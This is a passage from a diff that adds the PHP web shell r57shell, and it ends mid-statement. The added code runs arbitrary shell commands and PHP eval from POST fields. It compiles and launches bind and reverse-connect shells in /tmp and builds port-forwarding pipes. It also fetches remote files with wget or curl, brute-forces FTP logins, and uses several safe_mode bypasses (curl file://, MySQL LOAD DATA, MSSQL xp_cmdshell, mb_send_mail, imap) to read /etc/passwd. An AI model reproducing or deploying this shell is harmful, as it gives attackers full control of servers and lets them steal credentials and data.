$_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + @fwrite($file,$_POST['e_text']); + @touch($_POST['e_name'],$mtime,$mtime); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down")) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute") + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { fe($language,0); $_POST['cmd'] = ""; } + else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + @ftp_close($connection); + } +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'test5': + if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); + $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $lines = file ('/tmp/mb_send_mail'); + foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; } + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo $str; + @imap_close($stream); + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="ftp_brute") + { + $suc = 0; + foreach($users as $user) + { + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; } + else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } + @ftp_close($connection); + } + echo "\r\n-------------------------------------\r\n"; + $count = count($users); + if(isset($_POST['reverse'])) { $count *= 2; } + echo $lang[$language.'_text97'].$count."\r\n"; + echo $lang[$language.'_text98'].$suc."\r\n"; + } +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; } + else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; } + else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; } + else { + if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; } + else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } + else { echo "[-] ERROR! Can't write in dump file"; } + } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +function up_down($id) + { + global $lang; + global $language; + return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">'; + } +function div($id) + { + if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; + return '<div id="'.$id.'">'; + } +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; +echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); +echo $te.'</div>'.$table_end1.$fe; +if($safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; +echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; +echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode){ +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo 